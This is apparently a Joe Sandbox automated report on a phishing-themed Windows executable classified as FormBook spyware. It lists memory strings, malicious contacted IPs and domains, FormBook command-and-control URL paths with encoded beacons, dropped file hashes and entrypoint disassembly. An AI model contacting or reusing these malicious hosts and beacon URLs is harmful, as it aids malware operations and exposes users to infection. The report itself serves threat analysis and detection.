                                    https://duckduckgo.com/ac/?q=Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.instagram.com/hover_domainsUtilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        https://www.hover.com/transfer_in?source=parkedUtilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.hover.com/renew?source=parkedUtilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://login.live.cUtilman.exe, 00000005.00000002.4579598695.0000000002B6F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.ecosia.org/newtab/Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.hover.com/email?source=parkedUtilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.hover.com/about?source=parkedUtilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ac.ecosia.org/autocomplete?q=Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.hover.com/domains/resultsUtilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.hover.com/tos?source=parkedUtilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchUtilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.76kdd.topeAdBvdCMNQkVZK.exe, 00000007.00000002.4582285019.0000000005592000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Utilman.exe, 00000005.00000002.4583436803.0000000007CEA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.hover.com/tools?source=parkedUtilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://help.hover.com/home?source=parkedUtilman.exe, 00000005.00000002.4581410453.00000000057CA000.00000004.10000000.00040000.00000000.sdmp, Utilman.exe, 00000005.00000002.4583225986.0000000007990000.00000004.00000800.00020000.00000000.sdmp, eAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.hover.com/?source=parkedeAdBvdCMNQkVZK.exe, 00000007.00000002.4580626527.00000000039AA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    13.248.169.48
                                                    		www.tals.xyzUnited States
                                                    		16509AMAZON-02UStrue
                                                    209.74.77.108
                                                    		www.hobbihub.infoUnited States
                                                    		31744MULTIBAND-NEWHOPEUStrue
                                                    172.67.167.146
                                                    		www.rgenerousrs.storeUnited States
                                                    		13335CLOUDFLARENETUStrue
                                                    154.12.28.184
                                                    		www.7261ltajbc.bondUnited States
                                                    		174COGENT-174UStrue
                                                    38.47.232.194
                                                    		76kdd.topUnited States
                                                    		174COGENT-174UStrue
                                                    104.21.41.74
                                                    		www.conansog.shopUnited States
                                                    		13335CLOUDFLARENETUStrue
                                                    216.40.34.41
                                                    		www.sipdontshoot.netCanada
                                                    		15348TUCOWSCAtrue

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1560288
                                                    Start date and time:2024-11-21 16:14:05 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 10m 9s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:7
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:Mandatory Notice for all December Leave and Vacation application.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/3@7/7
                                                    EGA Information:
                                                    • Successful, ratio: 66.7%
                                                    HCA Information:
                                                    • Successful, ratio: 86%
                                                    • Number of executed functions: 52
                                                    • Number of non-executed functions: 292
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: Mandatory Notice for all December Leave and Vacation application.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    10:16:20API Interceptor9183335x Sleep call for process: Utilman.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    13.248.169.48Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                    • www.tals.xyz/k1td/
                                                    DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                    • www.aiactor.xyz/x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq
                                                    CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                    • www.remedies.pro/hrap/
                                                    SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.optimismbank.xyz/lnyv/
                                                    New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                    • www.avalanchefi.xyz/ctta/
                                                    need quotations.exeGet hashmaliciousFormBookBrowse
                                                    • www.egldfi.xyz/3e55/
                                                    Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.tals.xyz/010v/
                                                    Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                    • www.wajf.net/dkz5/
                                                    rG5EzfUhUp.exeGet hashmaliciousSakula RATBrowse
                                                    • www.polarroute.com/newimage.asp?imageid=zcddwc1730788541&type=0&resid=5322796
                                                    dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                    • www.extrem.tech/ikn1/
                                                    209.74.77.108CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                    • www.mindfulmo.life/grm8/
                                                    38.47.232.194DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                    • www.76kdd.top/idu4/?KV=qD8cAnDgckBLYUQoRh7zBwgp4vAR8SH4vArrPOMmIDAln/sBv7g5z1sASbSU3sLbiWKHdb75VGXih9cbyGRF9rbA94O5jPyz1SB60B/cp/B1u7O6lua4pvo=&Wno=a0qDq
                                                    Hire P.O.exeGet hashmaliciousFormBookBrowse
                                                    • www.zz67x.top/45n6/
                                                    Order.exeGet hashmaliciousFormBookBrowse
                                                    • www.zz67x.top/45n6/
                                                    SDBARVe3d3.exeGet hashmaliciousFormBookBrowse
                                                    • www.zz67x.top/45n6/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    www.rgenerousrs.storeRFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                    • 188.114.97.3
                                                    www.conansog.shopSWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 172.67.162.12
                                                    FOTO#U011eRAFLAR.exeGet hashmaliciousFormBookBrowse
                                                    • 104.21.41.74
                                                    www.tals.xyzThermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                    • 13.248.169.48
                                                    Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 13.248.169.48

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUShttp://xmrminingproxy.comGet hashmaliciousUnknownBrowse
                                                    • 104.21.6.188
                                                    Loader.exeGet hashmaliciousLummaCBrowse
                                                    • 104.21.66.38
                                                    VMX.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.198.61
                                                    Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnkGet hashmaliciousDucktailBrowse
                                                    • 104.21.15.40
                                                    https://spacardportal.works.com/garGet hashmaliciousUnknownBrowse
                                                    • 104.18.86.42
                                                    ADZ Laucher.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.155.248
                                                    Loader.exeGet hashmaliciousLummaCBrowse
                                                    • 172.67.219.199
                                                    Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnkGet hashmaliciousDucktailBrowse
                                                    • 172.67.161.101
                                                    S0FTWARE.exeGet hashmaliciousStealc, VidarBrowse
                                                    • 172.64.41.3
                                                    http://modelingcontest.000.pe/en?fbclid=PAZXh0bgNhZW0CMTEAAaa6oIoeflm16eQmOq1EZIkCPi7LQwqIUcx7ZtlQ7FlCxpWEYZM0cKUWzVI_aem_dLuQfyf714XDRjlRdJDY2QGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.25.14
                                                    AMAZON-02USla.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                    • 34.243.160.129
                                                    https://bitly.cx/aMW9O9Get hashmaliciousUnknownBrowse
                                                    • 18.200.123.41
                                                    dvLKUpkeV8.elfGet hashmaliciousUnknownBrowse
                                                    • 54.171.230.55
                                                    phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                    • 13.248.176.92
                                                    https://url.uk.m.mimecastprotect.com/s/1u4eCqxlyukZk7ltZfxHE-ELz?domain=andy-25.simvoly.comGet hashmaliciousHTMLPhisherBrowse
                                                    • 18.245.31.108
                                                    https://cardpayment.microransom.us/XYmdKR004c2prdTQ3eFRYdTZlUlAwSGhsclU2V3JnMWpuZ2h3Njg2emV0U3ZLY1Z4RkpNZm9HbkpHck9SNjFHb01Yem5jSDVSb2RmaXRIWUNvN2g1UHR4NlNzM05yeWg0R2VJSzhzSFlRVTN6UFZHYWpZSUxBeXpsYmtPMjFua1J5RFlLdm5OUVBGRnl2UWRxSjhpUFRwL1VXS1RqNEJjMmJwNkVPOVkvV2o3S3R0MkYzS1VXOG5uS1hHVll2eDdUb3hmcGtBb2VBTUdHc3hweEtXV25WRVZKdDBwWCtVZGtobzFsamp3PS0tYVREdUlIcWNwNFJ5RjAxci0tQWs2bGpCejYzaGsxMWJqSll4TWFNQT09?cid=293298779Get hashmaliciousKnowBe4Browse
                                                    • 52.214.139.140
                                                    +11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msgGet hashmaliciousHtmlDropperBrowse
                                                    • 13.32.121.48
                                                    https://rebrand.ly/gs02u8aGet hashmaliciousUnknownBrowse
                                                    • 76.76.21.98
                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                    • 13.32.99.21
                                                    MULTIBAND-NEWHOPEUShttp://mt6j71.p1keesoulharmony.com/Get hashmaliciousHTMLPhisher, EvilProxyBrowse
                                                    • 209.74.95.101
                                                    CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                    • 209.74.77.108
                                                    RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                    • 209.74.77.107
                                                    A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                    • 209.74.77.109
                                                    https://hmjpvx0wn1.gaimensebb.shop/Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                    • 209.74.95.101
                                                    Order No 24.exeGet hashmaliciousFormBookBrowse
                                                    • 209.74.64.58
                                                    dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                    • 209.74.64.187
                                                    RFQ.exeGet hashmaliciousFormBookBrowse
                                                    • 209.74.64.58
                                                    DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                    • 209.74.64.59
                                                    https://u47618913.ct.sendgrid.net/ls/click?upn=u001.ySazWJ5NZMDRHbOtEU-2BeoVq5CHimfeKOmAStZ-2FBgQMYQ3SSwsETAhk1yN-2BT4-2Bp2oKYzZov6D-2F-2FVWJZ1NqqUA8rkCQTGD9qAyzE3VfFeoQ2nuSJqqyEFkZOdD2fHyfAGMqPTrK5an3w0r3jeoJ-2B5P7rAm7lpee2LRBP-2FVZ8vpCC6OhMnZUP9C90hQTb0-2BpgFS16pphNEcXB1XFdv8oIx-2FwRORRrbhR98R4uG9rtcNDDwGDlWsc4rC8kZPQKm-2F1Mm8tNwYXTNsqE7C9scBPWKFj8-2Flkc4ljwpAg27SdTSH4Lv1yIeDUc-2Br14vSnR5hortDhaaXBKI0vawIBQmkU8qdJOSHyv8egzfUQvo0FmhKgqV1moo-2BnRe99IbJ35dDYZE0MrccJKFnB5BMI9ztOOsnQMWDWj4usmLc-2BeVbqm24LsVBI18WzbkH2NLJelVG2ts-2FY8NEmgO2IHd2ydt-2BhAOvQWuc-2BoCn3Ao-2FeTWrPbny4XNYysHB9Qu5AO8kwT-2BngJOg10GMOXJS1JsoXicgqZmKM-2B-2FBOfXRHNWtl98FVLgmqGL1yDRbHi-2BrUHFtCwtB3BRDatptZmQIPNmSCXkxadq8IAoDDcDLc8BntBCtxPjmUSXgMaBFfsbPygwonXOkWZIQIxp1wvHXj-2BZ1eIGRPTwfugS5VMB7jYi-2FePeZ2P8ejmUXu0aUYor7jxsavDdhhTlU0d3WGd7xXyc70gSNl4s0N8kb-2FhMFZ3OuPfAMZG-2BGWl7Vsgw97GpKKLJX78rYX8Dtq0-2BFHI8oijeDXiQEnvU-2FI4F3F63PGiFfTUlwdYZGBzmjvsDN3AL1dSwty6HpxvSAKCtZ9VWrfa8NwcaFPKhxnxW4r2AR9TTWpNatEfU14LjPxEM-2F6jXkw8omQsSQ5ERlG1h6ZTouS0rz5yiYIeyCUVpUuOT4FtnK35YgC-2B0S-2FAum0FNVEv9aFTVDigH5szZA6pWOYsjwY5forGtNE55v7VxXGbkIRiEOYPWjYX7vj5EKbcmwdWMu8O3989atXdomEpBZG0cX1ylWoweLRVGVMNbSs-2FOqs-2B2xH8pdGj9VcybpSShtsD0ZIyshNyN0TwKGcJvKUNgMPDQVU64V5WleuedIajiM6uCp0xLc8RFYl0z-2B6RGF9NRTuzleNM-2Fg7hwq-2BEg52eVJjsFh3FdZjf0sr4TFySEDrqq3wci8zEr-2FI5c5Wj-2Fk-2F98bI-2FtCrFbLhfO78CKXQ3KYT53otrRT47GTmw-3D-3DwgKy_cipWnXOVDIhOM-2BBXOyzcHeOgQULBtPxx5riDWemF2G-2BwYzp7goEAXusjqSQprai9ZAQSor3gqS04DnqVBNX-2B27UevOScScKFnEaHJjzQ16GEAAakNELZybevGcJfbhSMyz-2FBkUhDktUr20hzj2tsCmKBBmBXnfL9SKUCvI82Axz3RMcAfJhD5XZvwDkb1SgvyUaaM4lOGnGhDtzRF5NN8-2FlqjhJjS-2FU6ncYoAfO4VYI-3DGet hashmaliciousHTMLPhisherBrowse
                                                    • 209.74.72.93

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Temp\40473HJ96

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\Utilman.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                    Category:dropped
                                                    Size (bytes):196608
                                                    Entropy (8bit):1.121297215059106
                                                    Encrypted:false
                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\autB2CC.tmp

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):288256
                                                    Entropy (8bit):7.995592936197583
                                                    Encrypted:true
                                                    SSDEEP:6144:NnXe5jWCnyHoN4T6Bb2FC1r9ZyYp54q6slbP5w3DmIoYjv:NnXe5jp4mbIsy8UYz5wj5j
                                                    MD5:87A1A253AC5175F0DC2A665564E11B26
                                                    SHA1:F677A0E0F44311AA4BD5BF63CEB7524DD9D41282
                                                    SHA-256:D359BA9DE8DA10FD7F60D98C95B17CE567E53AA851C142039DC58AFE337C5E28
                                                    SHA-512:15F35FF8876BABB7A7CD49900AC66E3FD6C4CB17568511A34BC6983EF72F3B3BD9F23C6910A0931A30DC9452AE6C6A9582DF549532155AF4F90D6065913413F3
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:tn.KTMH70B9K..NT.X8YXF94vKWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT.X8YVY.:6.^.i.5..j.Y''.(J6?4XY.(6#&X@b[.aC;:.1Vy..j.[$3(f:9H.KA1NT8XAXQ..TQ.j-/.."^.[...8_.B....+0.R....+&..=[0.9?.946KWMH7d.9K.0OT.d,.XF946KWM.76C2JJ1N.<X8YXF946K'YH74R9KAAJT8XxYXV946IWMN74B9KA1HT8X8YXF9D2KWOH74B9KC1..8X(YXV946KGMH'4B9KA1^T8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1` ] LYXF]g2KW]H74.=KA!NT8X8YXF946KWMh74"9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B

                                                    C:\Users\user\AppData\Local\Temp\biopsies

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Mandatory Notice for all December Leave and Vacation application.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):288256
                                                    Entropy (8bit):7.995592936197583
                                                    Encrypted:true
                                                    SSDEEP:6144:NnXe5jWCnyHoN4T6Bb2FC1r9ZyYp54q6slbP5w3DmIoYjv:NnXe5jp4mbIsy8UYz5wj5j
                                                    MD5:87A1A253AC5175F0DC2A665564E11B26
                                                    SHA1:F677A0E0F44311AA4BD5BF63CEB7524DD9D41282
                                                    SHA-256:D359BA9DE8DA10FD7F60D98C95B17CE567E53AA851C142039DC58AFE337C5E28
                                                    SHA-512:15F35FF8876BABB7A7CD49900AC66E3FD6C4CB17568511A34BC6983EF72F3B3BD9F23C6910A0931A30DC9452AE6C6A9582DF549532155AF4F90D6065913413F3
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:tn.KTMH70B9K..NT.X8YXF94vKWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT.X8YVY.:6.^.i.5..j.Y''.(J6?4XY.(6#&X@b[.aC;:.1Vy..j.[$3(f:9H.KA1NT8XAXQ..TQ.j-/.."^.[...8_.B....+0.R....+&..=[0.9?.946KWMH7d.9K.0OT.d,.XF946KWM.76C2JJ1N.<X8YXF946K'YH74R9KAAJT8XxYXV946IWMN74B9KA1HT8X8YXF9D2KWOH74B9KC1..8X(YXV946KGMH'4B9KA1^T8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1` ] LYXF]g2KW]H74.=KA!NT8X8YXF946KWMh74"9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B9KA1NT8X8YXF946KWMH74B

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.140075867030831
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Mandatory Notice for all December Leave and Vacation application.exe
                                                    File size:1'207'808 bytes
                                                    MD5:201ad7754669b4d766349530adcca029
                                                    SHA1:52d55c5235158a805ff0059793c5f349ccd87684
                                                    SHA256:e16a801f068e55f9b014ac4b4cde9415fec763830ef433cb4eb3e0ee9734bf04
                                                    SHA512:deb8dc19760060424257ccc20ee0b253b819fb4c69e4faff187b840d07898998786ebdc297d9e39ddd231b736f8840cf3b5568fe13779e639485e96faa31f158
                                                    SSDEEP:24576:ktb20pkaCqT5TBWgNQ7a6U0ANyAaOhfPMzyN6E6A:NVg5tQ7a6U0ANy1Wf35
                                                    TLSH:F145D01373DD8361C3B25273BA66B741AEBF782506A1F96B2FD4093DF920122521E673
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                    File Icon

                                                    Icon Hash:aaf3e3e3938382a0

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x425f74
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x673F1531 [Thu Nov 21 11:10:41 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:1
                                                    File Version Major:5
                                                    File Version Minor:1
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:1
                                                    Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                    Entrypoint Preview

                                                    Instruction
                                                    call 00007FCB112B7A8Fh
                                                    jmp 00007FCB112AAAA4h
                                                    int3
                                                    int3
                                                    push edi
                                                    push esi
                                                    mov esi, dword ptr [esp+10h]
                                                    mov ecx, dword ptr [esp+14h]
                                                    mov edi, dword ptr [esp+0Ch]
                                                    mov eax, ecx
                                                    mov edx, ecx
                                                    add eax, esi
                                                    cmp edi, esi
                                                    jbe 00007FCB112AAC2Ah
                                                    cmp edi, eax
                                                    jc 00007FCB112AAF8Eh
                                                    bt dword ptr [004C0158h], 01h
                                                    jnc 00007FCB112AAC29h
                                                    rep movsb
                                                    jmp 00007FCB112AAF3Ch
                                                    cmp ecx, 00000080h
                                                    jc 00007FCB112AADF4h
                                                    mov eax, edi
                                                    xor eax, esi
                                                    test eax, 0000000Fh
                                                    jne 00007FCB112AAC30h
                                                    bt dword ptr [004BA370h], 01h
                                                    jc 00007FCB112AB100h
                                                    bt dword ptr [004C0158h], 00000000h
                                                    jnc 00007FCB112AADCDh
                                                    test edi, 00000003h
                                                    jne 00007FCB112AADDEh
                                                    test esi, 00000003h
                                                    jne 00007FCB112AADBDh
                                                    bt edi, 02h
                                                    jnc 00007FCB112AAC2Fh
                                                    mov eax, dword ptr [esi]
                                                    sub ecx, 04h
                                                    lea esi, dword ptr [esi+04h]
                                                    mov dword ptr [edi], eax
                                                    lea edi, dword ptr [edi+04h]
                                                    bt edi, 03h
                                                    jnc 00007FCB112AAC33h
                                                    movq xmm1, qword ptr [esi]
                                                    sub ecx, 08h
                                                    lea esi, dword ptr [esi+08h]
                                                    movq qword ptr [edi], xmm1
                                                    lea edi, dword ptr [edi+08h]
